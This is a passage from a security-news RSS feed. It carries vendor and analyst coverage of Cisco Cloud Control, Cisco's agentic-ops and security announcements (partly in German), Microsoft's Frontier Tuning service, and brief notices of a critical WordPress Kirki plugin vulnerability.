<p>Cisco is continually innovating and collaborating with its partners to help customers seamlessly transform to agentic operations. <a href="https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2026/m06/cisco-unveils-agentic-platform-for-operating-and-defending-critical-it-infrastructure.html" rel="sponsored">Delve into all the action that was announced at Cisco Live 2026</a>.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is Cisco Cloud Control and why should customers care?]]></title>
<description><![CDATA[As is typical of Cisco, the company made several product announcements at its flagship event, Cisco Live. The most significant product announcement is Cisco Cloud Control, which recognizes that customers do not run separate Cisco products; they run one sprawling, interconnected environment that m...]]></description>
<link>https://tsecurity.de/de/3570274/it-security-nachrichten/what-is-cisco-cloud-control-and-why-should-customers-care/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570274/it-security-nachrichten/what-is-cisco-cloud-control-and-why-should-customers-care/</guid>
<pubDate>Wed, 03 Jun 2026 18:23:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As is typical of <a href="https://www.cisco.com/">Cisco</a>, the company made several product announcements at its flagship event, <a href="https://www.ciscolive.com/">Cisco Live</a>. The most significant product announcement is Cisco Cloud Control, which recognizes that customers do not run separate Cisco products; they run one sprawling, interconnected environment that must be monitored, secured, and increasingly operated with AI at machine speed.</p>



<p>That is what Cisco Cloud Control is supposed to be: a single management plane with one login, one view, and one operational model spanning networking, security, compute, observability, and collaboration. Cisco is positioning it as the foundation for its broader AgenticOps vision, in which human operators and AI agents work from the same data and in the same workspace, with humans still in control. For Cisco customers, this matters because the company is finally trying to turn its massive product portfolio into an actual platform.</p>



<h2 class="wp-block-heading">More than another console</h2>



<p>On paper, Cloud Control sounds simple enough. It provides a unified environment, a shared data layer, and a common system of action, while also giving customers access to capabilities such as unified inventory, topology, policy, identity, and event correlation across the Cisco estate. During the keynote demos, Cisco showed single sign-on, all assets in one place, a single topology view, and direct access to products such as Meraki, Splunk, Security Cloud Control, Intersight, Control Hub, and Cisco IQ.</p>



<p>That alone would be useful. Cisco’s biggest enterprise customers have spent years dealing with product silos that made perfect sense inside the org chart but far less sense in an actual IT environment. Networking had its console, security had its console, observability had its tools, collaboration had its dashboard, and the poor operator in the middle had to stitch it all together manually. Cloud Control is Cisco’s admission that this model no longer scales.</p>



<h2 class="wp-block-heading">Why the single dashboard matters now</h2>



<p>The timing here is not accidental. In the AI era, operations are no longer just about watching dashboards and opening tickets. Infrastructure teams are being asked to diagnose and fix problems faster, while the threat landscape is compressing the time between vulnerability disclosure and exploitation from weeks to minutes. Cisco’s argument is that if customers are going to operate and defend infrastructure at machine speed, they cannot keep jumping from console to console and trying to correlate everything by hand.</p>



<p>That is why the single dashboard is more strategic than it sounds. Cisco is not just aggregating links to existing products. It is trying to create a common operational context so people and agents can work from the same inventory, topology, telemetry, and policies. If the old model was “visibility first, action later,” the new model is supposed to be visibility, reasoning, and action, all within the same environment.</p>



<h2 class="wp-block-heading">The break from Cisco’s past</h2>



<p>At Cisco Live 2024, Chief Product Officer Jeetu Patel declared that within two years, Cisco would be unrecognizable in a positive way. Cisco Live 2026 marks that two-year milestone, and Patel (pictured at top) has indeed made Cisco unrecognizable, with Cloud Control the most recent example. Historically, Cisco has rolled out one “single pane of glass” after another. In the past, I’ve said that if there were a Magic Quadrant for single panes of glass, Cisco would be the runaway leader because it had so many.</p>



<p>This is what makes Cloud Control so interesting. Cisco explicitly says this is not a “single pane of glass,” and the company is right to make that distinction. In its own words, glass is passive; Cloud Control is designed to enable active execution, with policy and identity built directly into the control path. That is a sharp departure from the old enterprise management philosophy, in which the dashboard’s job was mostly to display information and leave the operator to figure out the rest.</p>



<p>Cisco is also changing the abstraction layer.</p>



<p>For years, the company sold management in product-sized chunks. Now it is talking about a secure harness for agentic infrastructure, complete with trusted access, normalized APIs, Model Context Protocol connectivity, telemetry, enforcement points, and governance to ensure actions are bounded, auditable, and reversible. That is a much more ambitious framing, and frankly, it has to be. In a world of AI agents, the real value is not in prettier user interfaces. It is in creating a trusted operating environment where agents can do useful work without breaking things. At Cisco Live, all product demonstrations have been delivered from within Cisco Cloud Control, showcasing the product’s breadth and depth. </p>



<h2 class="wp-block-heading">AI Canvas is where the story gets real</h2>



<p>One of the strongest parts of the announcement is AI Canvas, which Cisco is moving into controlled availability as part of Cloud Control, rather than keeping it locked inside individual products. Cisco describes AI Canvas as a multiplayer workspace where human operators and AI agents investigate and resolve issues together, using the same live evidence, with context persisting across handoffs, shift changes, and escalations.</p>



<p>That is important because enterprise IT does not need more AI window dressing. It needs help with the messy middle of operations, where a single performance issue can become a network, policy, application, and security question all at once. Cisco says AI Canvas can take a natural-language prompt, build a multi-agent investigation plan, gather evidence across domains, and return a sourced answer, with the operator still approving the path forward. If that works as advertised, Cisco is not just simplifying operations. It’s changing how infrastructure work gets done.</p>



<h2 class="wp-block-heading">The marketplace makes this bigger than Cisco</h2>



<p>The other notable component of the announcement is the Marketplace, which is central to whether Cloud Control becomes a platform or just a better Cisco front end.</p>



<p>The Marketplace is a catalog of apps, agents, and integrations built by Cisco, customers, and partners, and it already includes integrations from more than 50 ecosystem partners. The partner list includes AWS, Google Cloud, Linear, Microsoft, Okta, PagerDuty, ServiceNow, Slack, Snowflake, Tenable, and Wiz, among others.</p>



<p>That matters because no enterprise is all-Cisco. The company acknowledges that customers operate multivendor environments and need to customize workflows beyond what Cisco ships out of the box. With Agent Builder, App Builder, and Marketplace, Cisco is also enabling customers to connect third-party tools, build their own agents, and create custom apps on top of Cisco’s control plane rather than waiting for a roadmap. That is a big deal because it moves Cisco from a product vendor to a platform operator.</p>



<p>After the keynote, I caught up with Evan Mintzer, director of production infrastructure at <a href="https://customersbank.com/">Customers Bank</a>. While he appreciates having a single dashboard for their Cisco products, it’s the ecosystem partnerships that truly caught his attention. “When Cisco displayed the slide of supported vendors, I recognized several we already use and a few others we’re considering,” Mintzer shared. “That ecosystem will make integrating them into our environment much easier.”</p>



<h2 class="wp-block-heading">Why every Cisco customer should care</h2>



<p>During his keynote, Patel made a comment that I think succinctly captures the value of Cisco Cloud Control: “Cloud Control is at its core simplicity without losing the sophistication of Cisco, and so what we’ve tried to do is say all the products that you know from Cisco and love will be managed from it.”</p>



<p>Historically, customers had to choose between the ease of use of a dashboard and the CLI for more complex tasks. Now they can do both through a natural language interface.</p>



<p>It’s also about capturing more value from the Cisco investment many companies have already made. The more Cisco infrastructure a customer runs, the more value the platform should deliver by connecting inventory, topology, policy, security, and AI-driven workflows in one place. Cisco has always had broad reach across the stack, but breadth alone is not enough. Without a unifying control layer, breadth becomes portfolio sprawl. Cloud Control is Cisco’s best attempt yet to turn that sprawl into an advantage.</p>



<p>There is also a defensive reason to care. Cisco is positioning Cloud Control as the command center for a post-Mythos world, tying it to Live Protect, unified security policy, asset visibility, vulnerability posture, and broader agentic security controls. In other words, this is not just an operations console. Cisco wants it to become the place where customers defend infrastructure in real time.</p>



<h2 class="wp-block-heading">My advice to Cisco customers</h2>



<p>Customers should approach Cloud Control with both enthusiasm and discipline. If you are a Cisco-heavy shop, this could become the operational layer that finally ties your environment together. But do not accept the vision based on branding alone.</p>



<p>First, test how Cloud Control reduces cross-domain complexity. A single pane of links is not the same as a single operating model.</p>



<p>Second, rigorously evaluate the AI governance model. Cisco wisely emphasizes human approval, auditability and bounded actions, but customers should validate this in real workflows before letting agents take any consequential actions.</p>



<p>Third, take the Marketplace seriously from day one. The ability to manage the Cisco domain from a single dashboard has obvious appeal, but extending it across a large percentage of the overall environment can significantly simplify operations and troubleshooting.</p>



<p>Cisco has had the pieces for years: leadership positions in networking, security, observability, collaboration, and infrastructure, plus one of the deepest installed bases in enterprise IT. What it has lacked is the control plane to bind them all together. Cloud Control shows that the company understands the future will not be won by having the most dashboards. It will be won by having the operating layer where humans and AI agents can work.</p>



<p>And that is why this launch matters. Cisco Cloud Control is not just another product announcement. It is Cisco’s effort to become the system through which its customers run the agentic enterprise. It’s positioned itself as “Mission Critical Infrastructure for the AI era” — but with Cloud Control, it’s that plus the operational environment.</p>



<h4 class="wp-block-heading">Read more stories from Cisco Live 2026</h4>



<ul class="wp-block-list">
<li><a href="https://www.networkworld.com/article/4179942/cisco-live-the-network-is-back-and-ai-rewrote-the-rules.html">Cisco Live: The network is back, and AI rewrote the rules</a></li>



<li><a href="https://www.networkworld.com/article/4179673/cisco-brings-agentic-ops-platform-and-security-overhaul-to-cisco-live.html">Cisco brings agentic ops platform and security overhaul to Cisco Live</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco bringt Agentic-Ops-Plattform und umfassende Sicherheitsmaßnahmen]]></title>
<description><![CDATA[Die aktuellen Ankündigungen von Cisco zielen auf die neuen Anforderungen an Netzwerke, Sicherheit und Observability im KI-Zeitalter ab. CryptoFX /Shutterstock



Cisco hat die Netzwerkinfrastruktur aufgebaut, auf der das Internet und die Cloud basieren. Auf der Cisco Live machte das Unternehmen d...]]></description>
<link>https://tsecurity.de/de/3569786/it-security-nachrichten/cisco-bringt-agentic-ops-plattform-und-umfassende-sicherheitsmassnahmen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569786/it-security-nachrichten/cisco-bringt-agentic-ops-plattform-und-umfassende-sicherheitsmassnahmen/</guid>
<pubDate>Wed, 03 Jun 2026 15:38:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/05/csico_logo.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Cisco logo and font on dark background. 3D render. " class="wp-image-3991030" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Die aktuellen Ankündigungen von Cisco zielen auf die neuen Anforderungen an Netzwerke, Sicherheit und Observability im KI-Zeitalter ab.</figcaption></figure><p class="imageCredit"> CryptoFX /Shutterstock</p></div>



<p>Cisco hat die Netzwerkinfrastruktur aufgebaut, auf der das Internet und die Cloud basieren. Auf der <a href="https://www.ciscolive.com/" target="_blank" rel="noreferrer noopener">Cisco Live</a> machte das Unternehmen deutlich, dass es diese Position auch weiterhin einnehmen will, während Unternehmen von KI-Chatbots zu autonomen Agenten übergehen. Während Chatbots Fragen beantworten, ergreifen Agenten Maßnahmen: Sie führen Aufgaben aus, rufen Tools auf, nehmen Änderungen vor und arbeiten kontinuierlich mit maschineller Geschwindigkeit. Dadurch ändern sich die Anforderungen an Netzwerke, Sicherheit und Observability – und genau darauf zielen die aktuellen Ankündigungen ab.</p>



<p>Zu den wichtigsten Ankündigungen der Veranstaltung in Las Vegas gehören:</p>



<ul class="wp-block-list">
<li><strong>Cisco Cloud Control:</strong> Eine einheitliche Verwaltungsplattform, die Meraki, Nexus, Intersight, Splunk und Collaboration umfasst.</li>



<li><strong>Agentic Actions für Netzwerke:</strong> Geschlossene, autonome Fehlerbehebung für Campus- und Zweigstellennetzwerke.</li>



<li><strong>Cisco Multicloud Fabric:</strong> Ein Cloud-basierter Dienst, der Zweigstellen, Rechenzentren und Cloud-Workloads über AWS, Azure, Google Cloud und Neoclouds hinweg verbindet.</li>



<li><strong>Erweiterung von Live Protect:</strong> Schutz vor Schwachstellen während des Betriebs ohne Neustarts oder Wartungsfenster, erweitert auf Smart Switches in Campus- und Zweigstellen.</li>



<li><strong>Agentic IAM:</strong> Temporäre, aufgabenbezogene Zugriffskontrollen für KI-Agenten, bereitgestellt über Cisco Secure Access.</li>



<li><strong>Cisco Data Fabric powered by Splunk:</strong> Federated Search, ein schlüsselfertiger Machine Data Lake, ein KI-Toolkit und ein Agentic SOC mit sechs speziell entwickelten Sicherheitsagenten.</li>



<li><strong>Neue Hardware:</strong> C9550 Core-Switch, 8100/8200/8300/8600 Secure Router, Outdoor-Wi-Fi 7, der IR1000-Industrierouter und das Cisco Board Pro G3.</li>
</ul>



<p>„Es geht nicht mehr darum, dass Menschen sich durch eine Vielzahl von Dashboards klicken und versuchen, den Überblick über die Aktivitäten der Agenten zu behalten“, erklärte <a href="https://www.linkedin.com/in/djsampath/" target="_blank" rel="noreferrer noopener">DJ Sampath</a>, Senior Vice President und General Manager für KI-Software und -Plattformen, während einer Pressekonferenz. „Ein echtes kollaboratives Betriebsmodell beginnt dann, wenn die Agenten die Hauptarbeit übernehmen und die Menschen stets die Kontrolle über das Wesentliche behalten.“</p>



<h2 class="wp-block-heading">Cisco Cloud Control</h2>



<p>Cloud Control soll die Vielzahl separater Verwaltungsoberflächen für Netzwerk, Sicherheit, Compute, Observability und Collaboration in einer einzigen Umgebung zusammenführen. Dort arbeiten Menschen und KI-Agenten mit denselben Daten und derselben Benutzeroberfläche.</p>



<p>„Mit Cloud Control erhalten Sie ein Maß an Sicherheit, das Ihnen ermöglicht, Ihre Infrastruktur wirklich effektiv zu verwalten“, betonte Sampath. „Es bietet Ihnen Kontrollmöglichkeiten zur Observability, es bietet Ihnen ein sicheres KI-Gateway sowie Leitplanken für diese Agenten. All das ist im Lieferumfang von Cloud Control enthalten.“</p>



<p>Zu den Kernfunktionen von Cloud Control gehören:</p>



<ul class="wp-block-list">
<li><strong>Domänenübergreifende Telemetrie</strong>: Cloud Control aggregiert Daten aus den Bereichen Netzwerk, Sicherheit, Observability, KI-Infrastruktur und Zusammenarbeit in einer gemeinsamen Datenstruktur, auf die sowohl Betreiber als auch Agenten gleichzeitig zugreifen.</li>



<li><strong>Speziell entwickelte Modelle</strong>: Eingehende Aufgaben werden an das am besten geeignete KI-Modell weitergeleitet, anstatt durch ein einziges großes Sprachmodell geleitet zu werden. Zu den Cisco-eigenen Modellen gehören das Deep Network Model, das mit vier Jahrzehnten an operativen Netzwerkdaten trainiert wurde, ein Foundation Security Model sowie ein Zeitreihenmodell für die Telemetrieanalyse. Für allgemeine Aufgaben, die logisches Schlussfolgern erfordern, stehen Frontier-Modelle zur Verfügung.</li>



<li><strong>Vertrauenswürdige Agenten</strong>: Agenten basieren auf Live-Telemetriedaten, unterliegen unternehmensweiten Sicherheitsrichtlinien und sind bereit, Aufgaben mit maschineller Geschwindigkeit auszuführen.</li>



<li><strong>Cloud Control Studio</strong>: Das für Ende 2026 geplante Studio bietet einen „Agent Builder“ zur Erstellung benutzerdefinierter Agenten mit Anbindung an mehr als 50 Plattformen von Drittanbietern über native Konnektoren oder das Model Context Protocol sowie einen „App Builder“, der OpenAI’s Codex in die Plattform integriert. Alle in Cloud Control erstellten Komponenten übernehmen automatisch dessen Observability- und Sicherheitskontrollen.</li>



<li><strong>Cloud Control Marketplace:</strong> Das Angebot startet mit Integrationen unter anderem in den Bereichen IT-Service-Management (ServiceNow, Atlassian, BMC), Identitätsmanagement (Okta, Ping Identity, Microsoft Entra ID, Jamf), Netzwerküberwachung (LiveAction, Panduit), Infrastrukturwissen (NetBox Labs, Device42, Vertiv) und KI-native Plattformen (Anthropic, OpenAI, NVIDIA, Collibra).</li>
</ul>



<h2 class="wp-block-heading">Agentic Networking und Multicloud Fabric</h2>



<p>Mit Agentic Actions führt Cisco einen autonomen Ablauf für den Netzwerkbetrieb ein. Die Funktion folgt einem fünfstufigen Zyklus: Erkennen, Diagnostizieren, Beheben, Validieren, Bereitstellen.</p>



<p>Dabei wandelt „Experience Metrics“ rohe Telemetriedaten in Echtzeit in Messwerte zur Benutzererfahrung um. „Deep Reasoning“ wendet die speziell von Cisco entwickelten Modelle auf eine mehrstufige Ursachenanalyse an. „Digital Twin“ wiederum betreibt eine emulierte Nachbildung des Produktionsnetzwerks unter Verwendung realer Software-Images anstelle eines mathematischen Modells, sodass Agenten Änderungen vor der Bereitstellung testen können. Die Beta von Agentic Action startet im Juni 2026 über Meraki, der Digital Twin geht im Juli 2026 in die Alpha-Phase.</p>



<p>Die zweite Ankündigung in diesem Bereich betrifft Cisco Multicloud Fabric. Sie verbindet Niederlassungen, Rechenzentren und Cloud-Workloads über AWS, Azure, Google Cloud und Neocloud-Anbieter hinweg mittels eines von Cisco verwalteten Overlays, ohne dass kundenseitige Hardware erforderlich ist. Die Fabric umfasst Zero-Trust-Routing, Cloud-Firewall-Service-Chaining sowie integrierte Observability von ThousandEyes und Splunk.</p>



<p>„Cisco entwickelt und betreibt den Cloud-basierten Dienst, sodass der Kunde nichts installieren oder bereitstellen muss“, führt <a href="https://www.linkedin.com/in/anurag-dhingra/">Anurag Dhingra</a>, Senior Vice President und General Manager für Enterprise Connectivity and Collaboration bei Cisco, aus. „Er ist sofort verfügbar, lässt sich nahtlos mit einem Klick in Cisco Cloud Control konfigurieren und verbindet all diese Verbindungen innerhalb von Minuten.“</p>



<h2 class="wp-block-heading">Sicherheit: Live Protect und Agentic IAM</h2>



<p>Frontier-KI-Modelle haben das Zeitfenster zwischen der Entdeckung einer Schwachstelle und deren Ausnutzung von Monaten auf Minuten verkürzt. Cisco reagiert darauf mit Laufzeit-Abwehrmaßnahmen, die auf der Infrastrukturebene wirken, sowie einem neuen Zugriffskontrollmodell, das speziell für KI-Agenten entwickelt wurde.</p>



<p><strong>Live Protect:</strong> Bietet Laufzeitschutz direkt auf Netzwerkgeräten, ohne Neustarts oder Wartungsfenster. Schutzmaßnahmen können gezielt auf einzelne Prozess- oder Dateiinteraktionen angewendet werden.</p>



<p><strong>Agentic IAM</strong>: Anstelle einer rollenbasierten Zugriffsregelung erhalten Agenten nur kurzfristige Berechtigungen, die auf eine konkrete Aufgabe beschränkt sind und über Cisco Secure Access mittels mehrstufiger LLM-, API- und MCP-Richtliniendurchsetzung bereitgestellt werden.</p>



<p>„Wir bewegen uns von Zugriffskontrolle hin zu Aktionskontrolle“, erläutert <a href="https://www.linkedin.com/in/tomgillis1/">Tom Gillis</a>, Senior Vice President und General Manager für Infrastruktur und Sicherheit. „Der Zugriff erfolgt genau zum richtigen Zeitpunkt, mit genau den erforderlichen Rechten und nur so lange wie nötig.“</p>



<p><strong>Schutz nicht-menschlicher Identitäten</strong>: Um die Sicherheit agentischer KI zu verbessern, integriert Cisco Technologie, die das Unternehmen durch die<a href="https://www.networkworld.com/article/4166695/cisco-grabs-astrix-to-secure-ai-agents.html"> Übernahme von Astrix Security</a> erworben hat. Die Technologie nutzt die Überprüfung auf Prozessebene, um Agentenaktivitäten von menschlichen Aktivitäten zu unterscheiden. Zudem wird <a href="https://www.networkworld.com/article/4148823/cisco-goes-all-in-on-agentic-ai-security.html"> DefenseClaw,</a> Ciscos Open-Source-Framework für Laufzeit-Sicherheit bei KI-Agenten, in Cisco Secure Client integriert. Da Secure Client auf mehr als 200 Millionen Unternehmensgeräten im Einsatz ist, bedeutet dies, dass Agentenschutz auf Endpunkt-Ebene unternehmensweit angewendet werden kann, ohne dass Entwickler jeden Agenten einzeln instrumentieren müssen.</p>



<h2 class="wp-block-heading">Cisco Data Fabric und das Agentic SOC</h2>



<p>Cisco Data Fabric, das im September 2025 eingeführt wurde, erhielt auf der Cisco Live ein umfangreiches Update. Basierend auf Splunk konsolidiert die Lösung Telemetriedaten aus Netzwerk-, Anwendungs-, Sicherheits- und Drittanbieterquellen in einer gemeinsamen Ebene, auf die sowohl menschliche Analysten als auch automatisierte Agenten zurückgreifen können, und dient als Datengrundlage für Cloud Control und das Agentic SOC.</p>



<p>Zu den Verbesserungen gehört eine optimierte Funktion für die föderierte Suche. „Anstatt Daten in Splunk zu verschieben, bringen wir Splunk zu den Daten und können diese Daten über verschiedene Umgebungen hinweg abfragen, ohne sie zu kopieren oder zu verschieben“, erklärt <a href="https://www.linkedin.com/in/kamal-hathi/">Kamal Hathi</a>, Senior Vice President und General Manager bei Splunk.</p>



<p>Außerdem gibt es einen AI Toolkit Agent Builder, der domänenspezifische Modelle für den Umgang mit Maschinendaten bereitstellt, sowie das, was Cisco als „Turnkey Machine Data Lake“ bezeichnet – eine Lösung, die das Schemamanagement für Rohdaten mithilfe von KI automatisiert.</p>



<p>Aufbauend auf der Data Fabric setzt Cisco zudem ein Agentic SOC mit speziell entwickelten Agenten ein, die den gesamten Lebenszyklus von Erkennung und Reaktion abdecken.</p>



<p>„Wir reduzieren den Zeit- und Aufwandsaufwand für Sicherheitsoperationen von Tage oder Stunden auf Minuten und Sekunden“, so Hathi.</p>



<p>Cisco geht noch einen Schritt weiter und integriert eine KI-gestützte SRE-Funktion (Site Reliability Engineering), die eine autonome Ursachenanalyse für Leistungsprobleme bei Anwendungen und der Infrastruktur durchführt. Die durch die Übernahme von Galileo Anfang dieses Jahres gewonnene Technologie erweitert die Observability auf Trace-Ebene bei der Agentenausführung und deckt dabei Tool-Aufrufe, LLM-Interaktionen und die Erkennung von Prompt-Injektionen ab.</p>



<p>„Splunk bietet uns dann vollständige Transparenz über alle Aspekte der Nutzung von KI- und agentenbasierten Lösungen und ermöglicht all dies wirklich in großem Maßstab auf vertrauenswürdige Weise“, erklärt Hathi. (mb)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress Plugin Flaw Opens Door to Privilege Escalation Attacks Across 500,000+ Sites]]></title>
<description><![CDATA[A critical security flaw in the Kirki – Freeform Page Builder, Website Builder & Customizer WordPress plugin is exposing sites to account takeover and privilege escalation attacks, with roughly 150,000 estimated to be running vulnerable versions introduced in the 6.0 release. Tracked as CVE-2026-...]]></description>
<link>https://tsecurity.de/de/3569567/it-security-nachrichten/wordpress-plugin-flaw-opens-door-to-privilege-escalation-attacks-across-500000-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569567/it-security-nachrichten/wordpress-plugin-flaw-opens-door-to-privilege-escalation-attacks-across-500000-sites/</guid>
<pubDate>Wed, 03 Jun 2026 14:39:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security flaw in the Kirki – Freeform Page Builder, Website Builder &amp; Customizer WordPress plugin is exposing sites to account takeover and privilege escalation attacks, with roughly 150,000 estimated to be running vulnerable versions introduced in the 6.0 release. Tracked as CVE-2026-8206 and rated 9.8 (Critical), the bug affects Kirki versions 6.0.0 through […]</p>
<p>The post <a href="https://gbhackers.com/wordpress-plugin-flaw-4/">WordPress Plugin Flaw Opens Door to Privilege Escalation Attacks Across 500,000+ Sites</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress Plugin Flaw Opens Door to Privilege Escalation Attacks Across 500,000+ Sites]]></title>
<description><![CDATA[A critical security flaw in the Kirki – Freeform Page Builder, Website Builder & Customizer WordPress plugin is exposing sites to account takeover and privilege escalation attacks, with roughly 150,000 estimated to be running vulnerable versions introduced in the 6.0…
Read more →
The post WordPre...]]></description>
<link>https://tsecurity.de/de/3569561/it-security-nachrichten/wordpress-plugin-flaw-opens-door-to-privilege-escalation-attacks-across-500000-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569561/it-security-nachrichten/wordpress-plugin-flaw-opens-door-to-privilege-escalation-attacks-across-500000-sites/</guid>
<pubDate>Wed, 03 Jun 2026 14:39:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security flaw in the Kirki – Freeform Page Builder, Website Builder &amp; Customizer WordPress plugin is exposing sites to account takeover and privilege escalation attacks, with roughly 150,000 estimated to be running vulnerable versions introduced in the 6.0…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/wordpress-plugin-flaw-opens-door-to-privilege-escalation-attacks-across-500000-sites/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/wordpress-plugin-flaw-opens-door-to-privilege-escalation-attacks-across-500000-sites/">WordPress Plugin Flaw Opens Door to Privilege Escalation Attacks Across 500,000+ Sites</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft’s Frontier Tuning aims to teach AI how enterprises work, not just context]]></title>
<description><![CDATA[For the past two years, enterprises have focused on feeding AI models their data — wiring them into documents, databases, and internal knowledge systems. Microsoft now says that’s only half the story. The next frontier, it argues, is teaching AI how work actually gets done.



At Build 2026, Micr...]]></description>
<link>https://tsecurity.de/de/3569428/it-nachrichten/microsofts-frontier-tuning-aims-to-teach-ai-how-enterprises-work-not-just-context/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569428/it-nachrichten/microsofts-frontier-tuning-aims-to-teach-ai-how-enterprises-work-not-just-context/</guid>
<pubDate>Wed, 03 Jun 2026 14:02:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For the past two years, enterprises have focused on feeding AI models their data — wiring them into documents, databases, and internal knowledge systems. Microsoft now says that’s only half the story. The next frontier, it argues, is teaching AI how work actually gets done.</p>



<p>At Build 2026, Microsoft introduced Frontier Tuning, a new service designed to help organizations develop AI models that continuously learn from workflows, tool interactions, and user feedback.</p>



<p>The goal is to create AI systems that adapt to an enterprise’s processes and decision-making patterns, rather than simply retrieve information from its data and knowledge stores, <a href="https://www.microsoft.com/en-us/research/people/ranveer/" target="_blank" rel="nofollow">Ranveer Chandra</a>, vice president of Copilot Tuning, wrote in a <a href="https://devblogs.microsoft.com/microsoft365dev/frontier-tuning-teaching-ai-to-work-the-way-you-do/" target="_blank" rel="nofollow">blog post</a>.</p>



<p>Unlike traditional model training approaches, which typically focus on improving a model’s accuracy using curated datasets and periodic fine-tuning cycles, Frontier Tuning introduces a guided <a href="https://www.infoworld.com/article/2261054/reinforcement-learning-explained.html">reinforcement learning (RL)</a> environment that continuously captures enterprise behavioral signals, creating an ongoing feedback loop between enterprise activity and model behavior, Chandra added.</p>



<p>The service also includes a sandboxed environment where enterprise teams can check the progress of the AI models without affecting production, the top executive further said, adding that the service operates within an enterprise’s existing security and governance boundaries, with tuned models inheriting the same permissions and access controls already enforced.</p>



<h2 class="wp-block-heading">Muscle memory for AI agents</h2>



<p>For <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="nofollow">Ashish Chaturvedi</a>, leader of executive research at HFS Research, the new service could prove valuable for CIOs because it adds another layer of enterprise context to AI systems, alongside existing services such as WorkIQ, FabricIQ, and FoundryIQ, which already help ground models and agents in business data and enterprise knowledge.</p>



<p>“The IQ offerings give agents the ‘map’, comprising organizational knowledge, ontologies, and real-time signals about how the business works. On the other hand, Frontier Tuning gives agents the ‘muscle memory’, reinforcement learning that trains the model to behave the way your organization actually operates,” Chaturvedi said.</p>



<p>“An agent that has context (IQ) but generic behavior produces decent answers. An agent that has both context and tuned behavior, including understanding your terminology, your approval chains, your style guides, and your compliance conventions, would produce answers that feel like they came from a seasoned employee. That’s the added value,” Chaturvedi added.</p>



<h2 class="wp-block-heading">Risk of decision paralysis</h2>



<p>However, <a href="https://www.linkedin.com/in/slwalter" target="_blank" rel="nofollow">Stephanie Walter</a>, practice lead of the AI stack at HyperFRAME Research, warned that Microsoft’s portfolio is getting complex and there is a risk of decision paralysis for CIOs.</p>



<p>“CIOs will need clear guidance on when to use Work IQ, Fabric IQ, Foundry IQ, Web IQ, RAG, fine-tuning, and Frontier Tuning. The risk is that more choice becomes more architectural ambiguity unless Microsoft makes the decision path very clear,” Walter said.</p>



<p>Chaturvedi, too, wasn’t impressed with the nomenclature of Microsoft’s services: “Microsoft isn’t doing itself any favors on the naming front. Between IQ (context), Frontier Tuning (model behavior), Foundry (agent deployment), Copilot Studio (low-code building), Fabric (data platform), and Rayfin (app backends), the surface area of Microsoft’s AI platform reads like a Russian novel.”</p>



<p>For mature enterprises, though, Walter sees Frontier Tuning adding choice: “Because not every problem can be solved with better prompting or retrieval. Some workflows require the system to learn the company’s preferred process, judgment patterns, and operating model.”</p>



<p>Reducing the complexity of enterprise agent development</p>



<p>Beyond the CIO considerations, Chaturvedi sees Frontier Tuning simplifying the development of more sophisticated enterprise agents by abstracting away much of the complexity associated with reinforcement learning.</p>



<p>“If you’re building an enterprise agent that needs to behave consistently with your organization’s conventions, Frontier Tuning collapses what used to be a multi-step workflow into a managed loop,” Chaturvedi said.</p>



<p>However, Walter pointed out that the new service necessarily doesn’t replace <a href="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html">prompt engineering</a>, <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">RAG</a>, or <a href="https://www.infoworld.com/article/2336988/the-limitations-of-model-fine-tuning-and-rag.html">fine-tuning</a>: “It is another layer for higher-value workflows where basic grounding is not enough. Developers should think of it as agent behavior tuning, not just model tuning.”</p>



<h2 class="wp-block-heading">Same problem, different approaches</h2>



